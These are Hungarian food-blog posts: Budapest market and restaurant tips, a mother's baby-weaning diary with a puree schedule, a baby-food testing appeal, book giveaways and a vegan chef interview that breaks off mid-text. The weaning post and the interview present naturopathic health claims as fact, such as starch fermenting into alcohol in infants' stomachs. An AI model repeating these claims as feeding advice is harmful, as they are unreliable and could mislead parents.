Egy nemzetközi kampány részeként cikket kellett írnom angolul kedvenc budapesti helyeimről (gasztronómiával kapcsolatosnak kellett lennie mindegyiknek), ahova a külföldi barátaimat, ismerőseimet is elvinném. Természetesen nagyon sok kedvenc helyem van, de a listát le kellett szűkítenem ötre, így most ezeket láthatjátok ebben a bejegyzésben. Írjátok meg nekem kommentben, hogy nektek melyek a kedvenc helyeitek Budapesten! 1. Szimpla Kert és Szimpla Vasárnapi Háztáji Piac Ide már jó pár külföldi barátomat elvittem és mindenki ámult-bámult, imádták a helyet. Az összevisszaság, a szedett-vedett retro bútorok megadják a hely báját. Természetesen nagyot dob a látványon a vasárnapi piac, ahol ugye meg is lehet kóstolni a kézműves portékákat, ráadásul mindig van non-profit szervezet támogatására közös főzés is (általában egy húsos és egy vega fogás), szóval nem megyünk haza éhesen! Szimpla Kert és Szimpla Vasárnapi Háztáji Piac 1075 Budapest Kazinczy utca 7. Weboldal Szimpla Kert Facebook Szimpla Vasárnapi Háztáji Piac Facebook 2. Biopiac Kedvenc termelőim: Nemes Mátyás és felesége, Marika A biopiac nálam az örök kedvenc. Ha nem utazunk el, minden szombaton kint vagyunk. Pláne, ha jó idő van, felélénkül a piac és rengetegen mennek vásárolni, beszélgetni, nézelődni, ücsörögni. A hely nagy előnye, hogy a MOM Művelődési Ház udvarán van, tehát van játszótér (igen, ez számunkra most már fontos ), pelenkázó, kulturált mellékhelyiség és a művelődési házhoz tartozó kávázó terasza, amely jó idő esetén egész délelőtt napsütésben úszik. Lassan nyolc éve járunk erre a piacra és most már kívülről-belülről ismerjük a helyet, egyes árusokat barátainknak nevezhetünk, vannak olyanok, akiknek a tanyáján, farmján is jártunk már (egyszer lesz belőle beszámoló!). Ez nálunk már tradíció: ha szombat, akkor biopiac. Minden alkalommal sok ismerőssel, baráttal találkozunk, szóval az biztos, hogy nekünk ez egy pár órás program, de a lényeg, hogy imádjuk! Biopiac 1124 Budapest Csörsz utca 18. Bejegyzés a biopiacról 3. Gozsdu udvar Fotó: a Gozsdu Udvar engedélyével Fotó: a Gozsdu Udvar engedélyével Fotó: a Gozsdu Udvar engedélyével Úgy gondolom, hogy a Gozsdu udvar egy új gasztronómiai színfoltja a városnak, ezért mindenképpen fel akartam venni a listába, mert itt van hagyományos magyar konyha, thai, olasz, trendi kávézók, bor bárok, kocsmák, szórakozóhelyek, valamint tavasztól őszig kézműves vásár. Néhány helyet már kipróbáltunk a Gozsdu udvarban és pozitív az élmény, ugyanis egyre több olyan hely van, ahol egy vegetáriánus is jól tud lakni. Két-három külföldi barátomat már elvittem és mindenkinek nagyon tetszett az udvar. Gozsdu udvar 1075 Budapest Between Király utca 13. and Dob utca 16. Weboldal Facebook 4. Ruszwurm Cukrászda Ha külföldre utazok én mindenképpen szeretek olyan helyekre elmenni, ahova a helyiek járnak, nem pedig a turisták. Nem akarok senkit megbántani, de a Gerbeaud (még, ha minden nagyon finom is náluk) az a hely, ahova a turisták járnak. Szóval úgy gondoltam, hogy erről úgyis sokan tudnak, inkább olyan helyet mutatok be, ahova a budapestiek járnak hétköznap, de főleg hétvégén, amikor is dugig van a hely. Igen, ez a Daubner cukrászda… ha jártatok már náluk hétvégén, akkor tudjátok miről beszélek: kígyózó sorok, még akkor is, ha legalább öt kiszolgáló pult van nyitva. Szóval a Daubnerről akartam írni, de sajnos nem engedik a fotók készítését, sem bent, sem kívül a Daubner közelében (még akkor sem, ha nemzetközi hírüket vinnék!!!), így úgy döntöttem, hogy egy másik helyet választok. Így jutott eszembe a Ruszwurm, ami egy kis bájos cukrászda a várban, ráadásul ide is vittem már külföldi barátnőmet, akinek nagyon bejött a hely. A krémesük valami isteni finom, szóval, aki még nem próbálta, az menjen minél előbb és kóstolja meg az édes bűnbeesést! Ruszwurm Cukrászda 1014 Budapest Szentháromság utca 7. Weboldal 5. Napfényes Vegán Étterem Gulyásleves / Töltött káposzta, a háttérben pedig Hortobágyi palacsinta Hamis túrógombóc (isteni finom, el is fogom készíteni és hozom a receptet) Szeretek a Napfényes Étterembe járni a hely atmoszférája, a kedves kiszolgálás, na és a finom ételek miatt. Úgy gondoltam, hogy egy vegetáriánus vagy vegán külföldinek, aki magyar ételeket szeretne kipróbálni, feltétlen tudnia kell erről a helyről. Noha készítenek nagyon finom pizzákat is, a fő vonal a magyar konyha. Napi választékuk is van (hétfőtől vasárnapig, általában egy leves, két főétel és egy főzelék vagy desszert), ezenkívül az a’la carte étlapról is lehet választani. Éhesen menjünk, mert nagy adagokat szolgálnak fel és még a húsevők is bőségesen jól laknak (ezt az Egy nap a városban szerzői is alátámasztják). Napfényes Étterem 1077 Budapest Rózsa utca 39. Weboldal Facebook ***** Az angol cikket a Fiji Water támogatta.
Táplálj helyesen édesanyám!
2014. január 25. Zizi kalandjai
Bambusz tálka és kanál: innen rendeltem Sokáig ültem ezen írás felett, elkezdtem, majd hetekig állt a szerkesztőben. Aztán, amikor majdnem kész lett, akkor gondolkodtam, hogy egyáltalán megjelentessem-e. Végül csak ráklikkeltem a “Közzététel” gombra. Szeretném jelezni, hogy ezek a saját tapasztalataim és a mások által leírt, általam elfogadott nézeteket türközik. Nem vagyunk egyformák, nyilván sokan másképp látjuk a világot. Tehát az itt leírtak nem biztos, hogy egyeznek a ti véleményetekkel. Ha csak egy információ a leírtak közül segítségetekre van, már azért megérte megjelentetni ezt az írást. Köszönöm a megértéseteket. ————————————- Amikor végiggondoltam, hogy miről is fogok írni ebben a bejegyzésben, akkor egyből beugrott Fűszer és Lélek, vagyis Eszter egyik korábbi bejegyzése “Kedves gravidák!”címmel. Majd olvassátok el, mert vicces. Éppen Eszter bejegyzése miatt gondolkodtam el, hogy mi legyen a bejegyzésem címe… hozzátáplálás, a kezdetek? Aztán anyukám odaadta ezt az “őskori” kis füzetet, amelynek ez a címe: Táplálj helyesen édesanyám! Mert ugye mi a legfontosabb? Az, hogy megfeleljünk a védőnőnek, a gyermekorvosnak, a szomszéd néninek vagy pedig, hogy gyermekünk egészséges, jól fejlődő és jól táplált kisbaba, gyermek legyen… aki ráadásul jókat eszik, szereti a pocakját és elégedett anyu főztjével. Gondolom, az utóbbit szeretnénk mindannyian. Persze ez nem jelenti azt, hogy ne kérjünk tanácsot, segítséget másoktól. De, kérjünk és persze olvassunk utána a témának, aztán hallgassunk az anyai megérzésünkre is, figyeljük meg, hogy mi ízlik a babának, vállaljuk fel a döntésünk felelősségét és cselekedjünk saját belátásunk szerint. Éppen ezért jelzem, hogy az itt leírtak (saját tapasztalat) csak tájékoztató jellegűek és anyatejes babára vonatkoznak. Én például a szilárd étel után simán tudok szoptatni, Ádinak nem lesz semmi baja tőle. Egy barátnőm azt mondta, hogy ő gyümölcs után nem ad tápszert a kisfiának, mert őt meghajtja. Szóval minden baba más, szent írás pedig nem létezik (szerintem). Ádi születése előtt tájékozódtam egy kicsit. Nem sokat tettem, csak annyit, hogy elolvastam a híres természetgyógyász Ferencsik István “Gyermekeink táplálása” című könyvét. Már évekkel ezelőtt beszereztem a könyvet antikváriumból egy barátnőm tanácsára, aztán nem is nyúltam hozzá tavalyelőtt őszig. Akkor elolvastam, aztán úgy döntöttem, hogy majd, ha a hozzátáplálásnál tartunk, akkor újra átfutom. Zseniális a könyv, de mai világunkban, amikor az ízek rabjai vagyunk, elég nehéz kivitelezni a benne leírtakat. Azt mindenképpen javaslom, hogy csak nyitott szívvel és lélekkel üljetek le a könyvet olvasni, mert Pista bácsi bíráló szavai rátok is hatással lesznek! Azonban nagyon sok hasznos információval szolgál a könyv és bizonyos dolgokat meg is tudok valósítani majd Ádi étkeztetésében. Néhány fontos információ, amelyekkel a hozzátáplálás során találkoztam vagy tapasztaltam… Melyik az a zöldség, amelyet leggyakrabban összekevernek más zöldséggel esetleg gyümölccsel, hogy gazdagabbá tegyék a baba ételét? Ha nincs meg a válasz, segítek. A burgonya. És mi a baj vele? Csak annyi, hogy a burgonya igen magas keményítőtartalmú táplálék és a fogak (őrlőfogak) megjelenése előtt nem lenne szabad adnunk a babáknak, ugyanis a csecsemőnek a fogak megjelenése előtt a nyálából ekkor még hiányzó ptyalin nevű fermentum miatt nem tudja a keményítőt megemészteni. Ha ezt nem tartjuk be, akkor előfordulhat, hogy a baba nyugtalan lesz, szélgörcsei lesznek, a gyomrában pedig a ptyalin hiánya miatt a keményítő megsavanyodik, majd alkohollá erjed. Ez a baba emésztőrendszerét beszennyezi és táptalajt nyújt a hurutképző és más kórokozó baktériumoknak. Egyik barátnőm jelezte is, hogy a nagyobbik kisfia ki is hányta a burgonyát (akkor ő még nem tudott erről), így nem adott neki többet egy éves koráig. Persze jöhet a kérdés, hogy akkor várjunk az őrlőfogak megjelenéséig és utána adjunk csak burgonyát? Ez olyan esetben nehezen kivitelezhető, mint a tejtesónknál, Zizinél, aki néhány napja lett egy éves és még nem bújt ki egy foga sem! Én egyelőre nem adtam burgonyát Ádinak, várok még vele néhány hónapot. Mi alma helyett sárgarépával indítottuk a szilárd ételek bevezetését. Két hétig csak ezt ette Ádi. Utána felépítettem neki az almát, aztán jött a sütőtök, a cékla, a zeller, a petrezselyemgyökér és nemrég a paszternák. Persze a cékla a legkevésbé nyerő, de ha keverve van répával és például almával, akkor simán megeszi. Az új szerelem a sütőtök paszternák kombó! Nekem is nagyon bejön… még az is lehet, hogy megihlet egy receptre! A Jolly Joker persze az alma. A biopiacon ismerkedtünk meg a Florina almával, ez elég édes, éppen emiatt baba almának is hívják, vagyis ezt javasolják babáknak. Persze Ádinak is nagyon bejött, imádja! Igyekszem a szezonalitásra figyelni a saját étkezésünkben, így Ádi étkezésében is, vagyis egyelőre kerülöm a déli gyümölcsöket és olyanokat adok csak, amelyek itt Magyarországon jelenleg szezonálisak. A banánról érdemes tudni, hogy a legjobban permetezett gyümölcs a világon. Én emiatt hanyagolom a banánt… Ádi úgyis fog eleget enni életében, most nem akarom még a szervezetét ezzel szennyezni (mármint a permetszerekkel). A fentebb említett őskori füzet a következőt írja: “Narancs, mandarin , grapefruit: levüket adhatjuk 3-4 hetes csecsemőnek. Eleinte teában, feles hígításban, cukorral édesítve.” (!!!) – No comment! Van még a füzetben egy-két hajtépő gondolat, azonban találtam hasznos információt is, mégpedig, hogy az étkezés megkezdése előtt pár kedves szóval mondjuk meg a babának, hogy mit kap enni, mutassuk meg neki az ételt, keltsük fel az érdeklődését és játékkal, énekkel ne vonjuk el a figyelmét az evéstől. Én már volt, hogy énekléssel hívtam fel magamra a figyelmet… , szóval nem elvontam a figyelmét, hanem inkább magamra és az evésre irányítottam, de persze ez elsülhet fordítva is. Az ételtársításoknál figyelembe veszem Gitta tanácsát, mely szerint a gyümölcsöket nem igazán jó keverni sem egymással, sem zöldségekkel. Ez alól egyetlen kivétel az alma: akár más gyümölcsökkel, akár zöldségekkel lehet párosítani, nem fog emésztési problémát okozni. Ez akkor lesz fontos, ha Ádi többféle gyümölcsöt is fog enni. Az almát nyersen adom, a zöldségeket pedig az esetek többségében tepsiben egy kevés vízzel felöntve megsütöm. Nagyon finom, édes marad az ízük. Általában 2 napra elegendő adagot készítek el, utána frisset sütök. A kezdetek Ádi 6 hónapos és 1 napos volt, amikor először kapott szilárd ételt. A gyermekorvosunk tanácsára így építettük fel a répát, majd hozzá az almát (nekünk nagyon bevált ez a módszer). Természetesen a szilárd étel bevezetése mellett a napi többszöri szoptatás megmaradt. 1. nap – 1 adagolókanál répapüré ebéd + utána szoptatás 2. nap – 3 adagolókanál répapüré ebéd + utána szoptatás 3. nap – 20 ml répapüré ebéd + utána szoptatás 4. nap – 50 ml répapüré ebéd + utána szoptatás 5. nap – 100 ml répapüré ebéd + utána szoptatás 6. nap – 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 7-14. nap – 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 15. nap – 1 adagolókanál almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 16. nap – 3 adagolókanál almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 17. nap – 20 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 18. nap – 50 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 19. nap – 100 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml répapüré vacsora + utána szoptatás 20. nap – 100 ml almapüré délelőtt tízóraira + utána szoptatás és 100 ml répapüré ebéd + utána szoptatás és 100 ml almapüré délután uzsonnára + szoptatás és 100 ml répapüré vacsora + utána szoptatás 21. nap – innentől legalább egy hétig napi 4 * 100 ml szilárd étel: egyik gyümölcs, egyik zöldség Ezután kezdtük a répát leépíteni, a sütőtököt pedig felépíteni. Másfél hónap eltelte után már nem voltam túlságosan kemény és lazítottam a dolgon, tehát a céklát, paszternákot és a többi újdonságot, csak simán beépítettem Ádi étrendjébe. Ha láttam, hogy nem ízlik neki, akkor hanyagoltam néhány napig az adott zöldséget, majd újra elővettem és kevertem más zöldségekkel vagy almával. Folyadék Az anyatejen kívül Ádi eddig csak vizet ivott. Gyümölcslevet és teát sem adtam még neki. Több barátnőm is mesélte, hogy ők is csak vizet adtak és később a gyerekek csak a vizet fogadták el, a gyümölcslére sem voltak nyitottak nagyon (nyilván minél több ételt/italt megkóstolnak, ez annál inkább változni fog). Ha kevesebbet fog Ádi szopizni, akkor növelni fogom a víz mennyiségét és bevezetem majd a növényi tejeket. Terveim szerint rizstejjel és mandulatejjel fogok próbálkozni, a tehéntejet hanyagolom. Bolti bébiételek Résen kell lenni és kötelező címkét olvasni! Teljesen ledöbbentem például az egyik cég vacsorára, lefekvés előtt ajánlott bébiételeitől. Van olyan, amelyikben van kakaó (koffeintartalom!!!) és cukor (ami felpörgeti a gyereket!!!). Vannak bio, csak zöldséget, csak gyümölcsöt és mondjuk vizet tartalmazó bébiételek. Egyszer piacoztunk, elcsúsztunk az idővel és sokára értünk volna haza, így vettünk bio répapürét és sütőtökpürét. Persze én is megkóstoltam és a sütőtöknek egyáltalán nem volt sütőtök íze, csak egyszerű pépesített zöldség íze. Amit én sütök a sütőben, az jó édes, össze sem hasonlítható a boltival! ———————————— Egyelőre itt tartunk majdnem 9 hónaposan. Ha kíváncsiak vagytok a folytatásra, akkor majd a továbbiakról is írok beszámolót!
Bébiétel teszt a Tudatos Vásárlók Egyesületével
2014. január 3. Zizi kalandjai
Hello 2014! Remélem mindenkinek jól kezdődött az új éve! Lassan kezdek visszarázódni a hétköznapokba, bár ezen a héten még egy kicsit lazítok, aztán jövő héttől indulhat a móka. Egy számomra fontos felhívást szeretnék megosztani veletek. A napokban kaptam egy emailt a Tudatos Vásárlók Egyesületétől, amelyben arról írtak, hogy egy új projektjükhöz támogatókat keresnek. Adakoztam tavaly év végén néhány szervezetnek, de a TVE új projektje nálam első olvasatra betalált, ugyanis bébiételeket szeretnének hivatalosan laboratóriumban bevizsgáltatni szakértő bevonásával és mivel ők egy nonprofit szervezet, ezért keresnek támogatókat, akik segítenek a projektjük megvalósításában. Egyből utaltam is nekik egy kisebb összeget, amely remélem hozzájárul ahhoz, hogy a bevizsgáltatás megtörténjen, mert úgy gondolom fontos tudnunk, hogy milyen minőségűek a boltok polcain található bébiételek. Bevallom két-három alkalommal már én is igénybe vettem őket, csakis bio répa-, sütőtök- és almapürét vettem eddig. Az alma egész finom, viszont a répának teljesen más az íze, mint, amit én készítek, a sütőtökről ne is beszéljünk… egyáltalán nincsen olyan finom édes íze, mint a saját magam által sütött töknek – almával keverve azért megette Ádi. Szóval íme a Tudatos Vásárlók Egyesületének felhívása… ha úgy gondoljátok számotokra is fontos egy ilyen eredményt tudni, akkor támogassátok a projektjüket! Adjuk össze, minden kicsi sokat számít! Kérjük, támogasd a bébiétel-tesztünket! A Tudatos Vásárlók Egyesülete csatlakozott az adjukossze.hu crowdfunding projektjéhez, ennek keretében olyan tesztre gyűjtünk adományokat, amelyet az egyesület önmagában nem tudna finanszírozni. Mit tesztelünk? A bébiételekben és babáknak szánt gyümölcslevekben laboratóriumi keretek között megvizsgáljuk a növényvédőszer-maradványok jelenlétét. Miért éppen bébiétel? Az elmúlt 5 év alatt a hivatalosan megvizsgált hazai termékek közül 2 babáknak szánt almalé és 6 bébiétel tartalmazott határértéken felüli mennyiségben növényvédőszer-maradékokat. Ezek károsíthatják a babák egészségét, jelenlétük a hatályos szabályok szerint gyakorlatilag nem is megengedett. Szeretnénk megtudni, mely termékek fogyaszthatók biztonsággal, előfordulnak-e permetszerrel szennyezett bébiételek a boltok polcain. Kérjük azokat a szülőket, nagyszülőket, akik szeretnék támogatni a bébiételek-és italok szermaradvány-vizsgálatát, hogy lehetőségeikhez mérten járuljanak hozzá ennek költségeihez. A Tudatos Vásárlók Egyesülete önkéntes munkában vállalja a vizsgálatra való összeg összegyűjtését, az eredmények széles körű terjesztését. Ha összegyűlik a kért összeg, elvégeztetjük 10 különböző termék akkreditált laboratóriumi vizsgálatát valamennyi releváns peszticidre (kb. 350 hatóanyag). A kapott eredményeket értelmezzük és magyarázatokkal látjuk el. Az eredményeket a TudatosVásárló.hu-n publikáljuk, így azok mindenki számára elérhetők lesznek. Ha esetleg kevesebb pénz gyűlne össze, akkor a vizsgált vegyszerek körét leszűkítjük a racionalitás határain belül. Tájékoztatásul: egy termék teljes körű vizsgálata kb. 80 000 Ft, a bébiételek-, italok beszerzésének ára kb. 4000 Ft, a szakértői díj (ha szükséges) megközelítőleg 150 000Ft. Az adományozáshoz csupán a bankkártyád és egy szabad fél perc szükséges! Kérjük, támogasd a projektünket! Köszönjük!
Farkas Lívia: Ennél zöldebb nem lesz! útmutató kézikönyv nyereményjáték
2013. december 22. Zizi kalandjai
Líviát, a Goldenblog nyertes blog szerzőjét egy munka kapcsán ismertem meg. Népszerű blogjának már régóta olvasója vagyok. Lívia 2008 óta publikál urban:eve nevű blogján női témákban – praktikus, gyakorlatias, inspiráló szemlélettel. Idén a Könyvhétre jelent meg az első könyve, Ennél zöldebb nem lesz! címmel (Bookline kiadó), amelyben gyakorlatias tanácsokat ad az időbeosztásra, a célkitűzésre, a motiváció fenntartására, az elvárások, félelmek, kritikák kezelésére, és arra, hogy mit csináljunk, ha a saját utunkra szeretnénk lépni (bármi is legyen az). Színes, rengeteg témát érintő blogja – de akár magazinnak is nevezhetjük -, értéket közvetít az olvasónak és rengeteg apró ötlettel, praktikus tanáccsal (lásd például ezt a nyomtatható 2014-es inspirációs naplót és tervezőt) szolgál minden nő számára. Ami a gasztro témát illeti, kiderült róla, hogy nagy rajongója blogomnak, ugyanis inzulinrezisztens, epehólyag nélkül élő vegaként halmozottan hátrányos helyzetben van, ha éttermekről van szó, így már csak a kényszer miatt is főz otthon elég gyakran, amit egyébként nagyon szeret. Kedvenc étele a sóska főtt krumplival és tükörtojással! Vele készült részletes interjúmat itt olvashatjátok. NYEREMÉNYJÁTÉK! Nyeremény : egy darab Ennél zöldebb nem lesz! dedikált kézikönyvet nyer egy szerencsés! Írjátok meg ide kommentben, hogy mi a neve Lívia törpenyuszijának! Egy kis segítséget itt találtok hozzá. Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontokért is)! Vagyis a számok (+5, +3, +3, +2, +2) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a zöld I commented! kockára (ez a lépés kötelező, a többi szabadon választható, plusz pontokat kaptok értük és még nagyobb eséllyel indultok a nyereményért); ha még nem vagy ha már lájkoltátok az urban: eve Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a zöld Im a Fan!-re. Hasonlóan járhattok el a többi pont esetében is. a Rafflecopter giveaway Szabályok : 2013. december 24-ig lehet játszani. Eredményhirdetés 2013. december 26-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesnek a könyvet Lívia postán elküldi (magyarországi címre).
Aran Goyoga: Small Plates & Sweet Treats gluténmentes szakácskönyv nyereményjáték
2013. december 18. Zizi kalandjai
Aran blogját évek óta követem. A blogjából áradó letisztultság, de egyben színkavalkád, művésziség és nyálcsorgató képek magával ragadóak. Aztán a neten keresztül megismerkedtünk és még az angol blogomra is készített egy vendégbejegyzést. Noha személyesen nem találkoztunk még, nagy vágyam, hogy egyszer részt vehessek egy workshopján. A mostanában Seattleben nyílt stúdiója pedig egyenesen álomszerű. Amikor kiderült, hogy szakácskönyvet ír, egyből tudtam, hogy olyan gyönyörű lesz, mint a blogja. Miss Fortuna és Jézuska is olvastak a gondolataimban, így két példányra is szert tettem még tavaly… aztán idáig vártam, hogy végre valaki megnyerhesse egy játék keretében. A Small Plates & Sweet Treats egy gluténmentes szakácskönyv, amely a négy évszakot körbejárva mutat be sós és édes recepteket, valamint Aran emlékeit gyerekkorából. A receptek izgalmasak és többségében vegák is, a képek csodásak, a grafika pedig fantasztikus miliőt alkot, keretbe foglalja a négy évszakot. Olyan könyv, amelyet érdemes csak úgy lapozgatni egy hideg estén egy meleg takaró alá bújva a kanapén és valami meleg italt szürcsölgetve. Én néhány óra alatt kiolvastam az egészet! Pár receptet már kipróbáltam a könyvből. Engem főleg a sütemények érdekelnek, ugyanis nincsen sok tapasztalatom gluténmentes sütés terén, szóval gyakorlásnak is kiváló, aki szeretné jobban beleásni magát a témába. NYEREMÉNYJÁTÉK! Nyeremény : egy darab Small Plates & Sweet Treats szakácskönyvet nyer egy szerencsés (a könyv angol nyelvű)! Menjetek fel Aran blogjára és írjátok meg ide kommentben, hogy melyik receptjét készítenétek el szívesen. Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontokért is)! Vagyis a számok (+5, +2, +2) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a zöld I commented! kockára (ez a lépés kötelező, a többi szabadon választható, plusz pontokat kaptok értük és még nagyobb eséllyel indultok a nyereményért); ha még nem vagy ha már lájkoltátok a Zizi kalandjai Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a zöld Im a Fan!-re. És még egy plusz pontért lehet követni a Zizi kalandjait Twitteren. a Rafflecopter giveaway Szabályok : 2013. december 20-ig lehet játszani. Eredményhirdetés 2013. december 21-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes a nyereményt személyesen átveheti Budapesten vagy postázom magyarországi címre.
Miattam ne szenvedjen egy állat sem! - interjú Stőhr Grétával
2013. december 11. La Veganista
Blogom vendége ezúttal, Stőhr Gréta vegán séf, életmód tanácsadó, gasztroblogger, a Gréta konyhája című könyv írója és a szintén Gréta konyhája néven futó televíziós műsor szerkesztő-háziasszonya. Arra kértem, hogy ossza meg velünk tapasztalatait, mesterfogásait, és adjon néhány praktikus tanácsot a karácsonyi időszakra. La V.: Amikor az interjú elkészítéséhez információkat gyűjtöttem rólad és a munkásságodról, rögtön felkeltette a figyelmem az, hogy vegetáriánus családban nőttél fel. Nem noszogattak azzal, hogy egyél még egy falat pipicombot, mert attól nősz nagyra? Miért lettek vegetáriánusok a szüleid? Honnan tudták, hogy hús nélkül is egészségesen cseperedsz fel? Gréta: Édesanyám egy komoly autoimmun betegség miatt kényszerűségből hagyta abba a húsevést, még gyerekkoromban. Édesapám csak később, vallási okok miatt lett vegetáriánus, de anyukám attól függetlenül elkészítette nekünk a húsos ételeket, bár én sosem szerettem igazán. Tömni nem tömtek, de abban az időben édesanyám sem tudott sokat a gyermekkori húsevésről, vagy annak hiányáról, így 2 évnél tovább nem tudtam vegetáriánus maradni. Tizenkét éves koromban, valahogy összeállt a fejemben, hogy az asztalomon lévő hús ártatlan, élni akaró, érző állatok tetemeiből való, és nem voltam hajlandó megenni. Ez körülbelül két évig tartott, azután a háziorvosunk megfélemlítő szigorú tanácsára, miszerint, ha nem eszem húst sosem leszek normális felnőtt, elkezdtem újra húst enni. Szóval abban az időben, ez hatalmas bűn volt egy anya részéréről, hogy nem adott húst a gyermekének. Pedig én mindig azt szerettem volna enni, amit anya evett. Már akkor belekóstoltam a változatos vegetáriánus-reform konyha világába, és nagyon megkedveltem. La V.: Mi ösztönzött arra, hogy három és fél évvel ezelőtt végleg felhagyj a vegetáriánus koszttal és áttérj a kizárólag növényi alapú élelmiszerek fogyasztására? Gréta: Nekem egyszer csak megvilágosodott minden. Tényleg minden pillér, szinte ugyanakkor épült fel bennem. Összehozott a sors az interneten csodásan szép, egészségtől kicsattanó nem öregedő vegán atlétákkal, és azt mondtam magamban:- Akarom a titkukat. A fiatalság forrását akarom. A másik, hogy ezzel egyidőben megnéztem az Earthlings (Földlakók) című filmet. Illetve az első 20 percét. Olyan mély szomorúságot éreztem, hogy eldöntöttem, nem akarok ennek a részese lenni. Miattam ne szenvedjen egy állat sem. Ahogy korábban is mondtam, nekem egyszer már gyermekkoromban összeállt a kép, és akkor megint megtörtént. Elkezdtem követni vegán embereket, recepteket, kihagytam az ételeimből a tejterméket tojást (mert akkor már 4-5 éve újra vegetáriánus voltam). Sorra jöttek a cikkek, miszerint a húsevés, ipari tejtermelés tojástermelés borzasztóan környezetszennyező, és még a világméretű éhezés is ennek a számlájára írható. Világossá vált számomra, mit is teszünk a lakóhelyünkkel, állatbarátainkkal, önmagunkkal. Én elmondhatom, hogy egyszerre lettem etikai-, spirituális-, egészségügyi-, és ökovegán. A testem-lelkem minden sejtje érzi, hogy ez a helyes Út! La V.: Egy helyen írtad, hogy az áttérés fizikai, lelki és szellemi értelemben is változásokat hozott. Konkrétan mit tapasztaltál? Gréta: Egész gyermekkoromban végigkísért egy makacs, krónikus arcüreggyulladás, és nem volt olyan év, hogy legalább kétszer ne szenvedjek tőle. Már mindent kipróbáltam, de megdöbbenve tapasztaltam, hogy abban az évben, mikor vegán lettem, nem volt ilyen panaszom. Sem télen, sem nyáron. A felső légúti megbetegedéseim gyógyulási aránya pedig 2-3 hétről, 2-3 napra redukálódtak. A másik, hogy a szülés után rajtam maradt felesleg, amit már sehogyan nem tudtam ledolgozni, egyszerűen 3-4 hónap után eltűnt, a kilók leolvadtak rólam. Nem is sejtjük, hogy az egészségesnek kikiáltott tejtermékek, mennyi rejtett zsírt, és cukrot tartalmaznak. A testünknek egyáltalán nincs szüksége erre. Testi értelemben nem öregszem, úgy érzem, visszafelé forog az idő. 25 éves koromban nem éreztem ilyen fittnek, tisztának, és energikusnak magam. A testem tisztulása mellett tudatom is tisztult, sokkal nyitottabb lettem. Érzem az embereket, intuícióm szinte tökélyre fejlődött, boldogabb, elégedettebb ember vagyok, akit az élet a tenyerén hordoz. De azt is megértettem, hogy ez egy belső döntés. Hiszem, hogy táplálkozásunk nagyban befolyásolja érzelmi és szellemi fejlődésünket. Ha életet eszem, magam is élek. La V.: Több évet töltöttél külföldön. Erről az időszakról úgy nyilatkozol, hogy az ott szerzett gasztronómiai tapasztalatok áthatják, inspirálják a konyhádat. Mely kultúrák kulináris élményei voltak a legmeghatározóbbak, hogyan jelennek meg a receptjeidben? Gréta: Mindegyik! Kivéve a lengyel konyhát, pedig Varsóban is éltem 5 évet. Ha most megkérdeznéd mi a kedvenc ételem, akkor egyértelműen azt mondanám: a vegán SUSHI!!!! De imádom az olasz konyhát, a koreait, a mexikóit, franciát, indiait és ezek gyakran visszaköszönnek a receptjeimben. Minden nemzetnek vannak isteni vegán, vagy kis kreativitással vegánosítható, egészséges fogásai. Például a guacamole, na azt, mindennap tudnám enni. Ha elmész egy magyar étterembe, a legtöbb helyen ugyanazt kapod. Ezen változtatni kell! Az embereknek tudniuk kell, hogy az olasz konyha nem merül ki a pizzában, mint ahogy a kínai sem, az édes-savanyú fogásokban. Fantasztikus élmény látni az embereket ahogy először megkóstolnak valamit, amit azelőtt még soha nem ettek. Látni az arcukon az örömöt, szemükben a fényt. Én elhozom a világ konyháit. A Vegán világét. La V.: Gasztroblogod elindítását az motiválta, hogy a kisfiadnak készített vegetáriánus ételek receptjeit másokkal is megoszd. Azóta vegán lettél, átalakultak a receptjeid. Ezek szerint a gyermeked is a vegán étrendet követi? Mit tanácsolsz a vegán gyerekek szüleinek, mire figyeljenek oda? Gréta: A kisfiam nem teljesen vegán (bár ő annak vallja magát), mert házon kívül is eszik. Óvodás. Ott tiszteletben tartják, hogy vegetáriánus, de nem kap külön vegetáriánus menüt, hanem azt eszi, amit a többiek, kivéve a húst. Ez itthon még katasztrofálisan gyerekcipőben jár. Ha valaki vegetáriánus gyermeket nevel, akkor eleve változatosabban főz, mint a húsevők. Mi sokkal több zöldséget használunk fel különböző módon. Figyelnünk kell arra, hogy sok nyers zöldség-gyümölcs legyen az alapja, a gyermek, napi étrendjének. Hetente fogyasszon legalább kétszer hüvelyest (bab, borsó, lencse, csicseriborsó), gabonák közül az édesen és sósan is elkészíthető rizst, kölest, quinoát. Ismertessük meg velük az édesburgonyát, tökféléket, avokádót. Ne tejes-cukros-zsíros egészségtelen édességet adjunk a gyermeknek, hanem készítsük együtt a finomságokat, például a banán-avokádó-kakakópudingot. Ismertessük meg velük a sokféle változatokban kapható nagyon finom, és könnyű növényi tejeket. Nassoljanak aszalt gyümölcsöket, sózatlan pörköletlen magvakat. Csíráztassunk velük együtt, és a teljes kiőrlésű kenyerekre tegyük csírákat 